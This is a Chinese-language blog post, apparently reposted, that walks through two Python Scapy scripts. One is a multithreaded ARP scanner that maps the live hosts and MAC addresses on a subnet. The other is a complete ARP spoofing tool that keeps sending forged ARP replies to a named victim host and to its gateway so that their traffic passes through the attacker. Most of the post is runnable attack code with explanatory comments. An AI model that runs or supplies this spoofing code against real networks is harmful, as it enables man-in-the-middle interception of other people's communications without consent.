devbox
我家小花儿
这个屌丝很懒,什么也没留下!
关注作者
热门标签
热门文章
当前位置:   article > 正文

Python Scapy库实现ARP扫描和ARP欺骗

作者:我家小花儿 | 2024-02-28 01:44:16

Python Scapy库实现ARP扫描和ARP欺骗

 ARP扫描:检测指定IP网段中哪些主机是在线的,并获取它们的MAC地址

  1. from scapy.all import *  
  2. import argparse  
  3. import threading  
  4. import time  
  5. import logging  
  6.   
  7. # 解析CIDR格式的网段,并返回IP地址列表  
  8. # >接受一个CIDR格式的网段作为输入(例如192.168.1.0/24)。
  9. # >将网段解析为IP地址列表。
  10. # >通过子网掩码长度计算IP地址范围,并生成该网段内所有可能的IP地址。
  11. def Parse_IP(targets):  
  12.     """  
  13.     将CIDR格式的网段字符串转换为IP地址列表。  
  14.   
  15.     :param targets: CIDR格式的网段字符串,例如"192.168.1.1/24"  
  16.     :return: IP地址列表  
  17.     """  
  18.     _split = targets.split('/')  # 按斜杠分割字符串,得到网络地址和子网掩码长度  
  19.     first_ip = _split[0]  # 获取网络地址  
  20.     ip_split = first_ip.split('.')  # 按点分割网络地址,得到各部分的数字  
  21.       
  22.     # 生成IP地址范围  
  23.     ipv4 = range(int(ip_split[3]), int(ip_split[3]) + (2 ** (32 - int(_split[1]))))  
  24.       
  25.     # 构建IP地址列表  
  26.     addr = [f"{ip_split[0]}.{ip_split[1]}.{ip_split[2]}.{p}" for p in ipv4]  
  27.     return addr  
  28.   
  29. # 使用ARP协议扫描指定IP地址,查找在线设备  
  30. # >接受一个IP地址作为输入。
  31. # >使用Scapy发送一个ARP请求到这个IP地址,并等待回复
  32. # >如果收到ARP回复,则提取并打印出该IP地址对应的MAC地址
  33. def ARP_Scan(address):  
  34.     """  
  35.     发送ARP请求到指定IP地址,并查找在线设备的MAC地址。  
  36.   
  37.     :param address: 要扫描的IP地址  
  38.     """  
  39.     try:  
  40.         # 发送ARP请求并等待回复,超时时间为5秒  
  41.         ret = sr1(ARP(pdst=address), timeout=5, verbose=False)  
  42.           
  43.         # 如果收到回复  
  44.         if ret:  
  45.             # 检查回复是否包含ARP层,并且操作码是否为2(表示ARP回复)  
  46.             if ret.haslayer('ARP') and ret.fields['op'] == 2:  
  47.                 # 打印IP地址和对应的MAC地址  
  48.                 print('[+] IP地址: %-13s ==> MAC地址: %-15s' %(ret.fields['psrc'], ret.fields['hwsrc']))  
  49.     except Exception as e:  
  50.         logging.error(f"An error occurred while scanning IP {address}: {e}")  
  51.         exit(1)  
  52.   
  53. # 程序入口 
  54. # >argparse模块解析命令行参数
  55. # >如果提供了扫描网段参数,则调用Parse_IP函数解析网段,获取IP地址列表
  56. # >每个IP地址创建一个新的线程来执行ARP_Scan函数
  57. if __name__ == "__main__":  
  58.     # 设置Scapy的日志记录级别为ERROR,以减少不必要的输出  
  59.     logging.getLogger("scapy.runtime").setLevel(logging.ERROR)  
  60.       
  61.     # 创建命令行参数解析器  
  62.     parser = argparse.ArgumentParser()  
  63.     parser.add_argument("-s", "--scan", dest="scan", help="输入一个扫描网段")  
  64.       
  65.     # 解析命令行参数  
  66.     args = parser.parse_args()  
  67.       
  68.     # 如果提供了扫描网段参数  
  69.     if args.scan:  
  70.         # 解析网段并获取IP地址列表  
  71.         addr_list = Parse_IP(args.scan)  
  72.           
  73.         # 创建线程列表  
  74.         threads = []  
  75.           
  76.         # 对每个IP地址启动一个新的扫描线程  
  77.         for item in addr_list:  
  78.             t = threading.Thread(target=ARP_Scan, args=(item,))  
  79.             threads.append(t)  
  80.             t.start()  
  81.           
  82.         # 等待所有线程完成  
  83.         for item in threads:  
  84.             item.join()  
  85.     else:   
  86.         parser.print_help()

ARP欺骗:通过伪造ARP响应来欺骗目标计算机和网关,使它们相信它们正在与对方通信,而实际上所有的通信都经过了攻击者的机器

  1. from scapy.all import *  
  2. import argparse  
  3. import threading, time  
  4. import logging  
  5.   
  6. # 定义SendPayload函数,用于发送ARP欺骗的数据包  
  7. def SendPayload(Interface, srcMac, tgtMac, gateWayMac, gatewayIP, tgtIP):  
  8.     # 打印目标MAC地址和目标IP地址,以及发送的数据包数量  
  9.     print("[+] 目标MAC: {} 目标IP: {} 发送: 2 packets".format(tgtMac, tgtIP))  
  10.       
  11.     # 生成并发送第一个ARP数据包,伪造网关的IP和MAC地址,欺骗目标计算机  
  12.     # 使目标计算机认为网关的MAC地址是攻击者的MAC地址  
  13.     sendp(  
  14.         Ether(src=srcMac, dst=tgtMac) /  # 以攻击者的MAC地址作为源MAC,目标计算机的MAC地址作为目的MAC  
  15.         ARP(hwsrc=srcMac, psrc=gatewayIP, hwdst=tgtMac, pdst=tgtIP, op=2),  # ARP数据包,其中op=2表示ARP回复  
  16.         iface=Interface
  17.     )  
  18.       
  19.     # 生成并发送第二个ARP数据包,伪造目标计算机的IP和MAC地址,欺骗网关  
  20.     # 使网关认为目标计算机的MAC地址是攻击者的MAC地址  
  21.     sendp(  
  22.         Ether(src=srcMac, dst=gateWayMac) /  # 以攻击者的MAC地址作为源MAC,网关的MAC地址作为目的MAC  
  23.         ARP(hwsrc=srcMac, psrc=tgtIP, hwdst=gateWayMac, pdst=gatewayIP, op=2), 
  24.         iface=Interface
  25.     )  
  26.   
  27. if __name__ == "__main__":  
  28.     # 创建命令行参数解析器  
  29.     parser = argparse.ArgumentParser()  
  30.     # 接口名 
  31.     parser.add_argument("-i", "--interface", dest="interface", help="输入接口名")  
  32.     # 网关地址
  33.     parser.add_argument("-g", "--gateway", dest="gateway", help="输入网关地址")  
  34.     # 目标主机地址  
  35.     parser.add_argument("-t", "--target", dest="target", help="输入被害主机地址")  
  36.     # 解析命令行参数  
  37.     args = parser.parse_args()  
  38.       
  39.     if args.gateway and args.target:  
  40.         # 通过接口名称获取本机的MAC地址  
  41.         srcMac = get_if_hwaddr(args.interface)  
  42.           
  43.         # 通过目标主机的IP地址获取其MAC地址  
  44.         tgtMac = getmacbyip(args.target)  
  45.           
  46.         # 通过网关的IP地址获取其MAC地址  
  47.         gatewayMac = getmacbyip(args.gateway)  
  48.           
  49.         # 持续发送ARP欺骗数据包  
  50.         while True:  
  51.             # 创建一个新线程来发送ARP欺骗数据包  
  52.             t = threading.Thread(target=SendPayload, args=(args.interface, srcMac, tgtMac, gatewayMac, args.gateway, args.target))  
  53.             t.start()  
  54.             t.join()   
  55.             time.sleep(1)  
  56.     else:  
  57.         parser.print_help()

声明:本文内容由网友自发贡献,不代表【wpsshop博客】立场,版权归原作者所有,本站不承担相应法律责任。如您发现有侵权的内容,请联系我们。转载请注明出处:https://www.wpsshop.cn/w/我家小花儿/article/detail/157043
推荐阅读
相关标签

Copyright © 2003-2013 www.wpsshop.cn 版权所有,并保留所有权利。

  

闽ICP备14008679号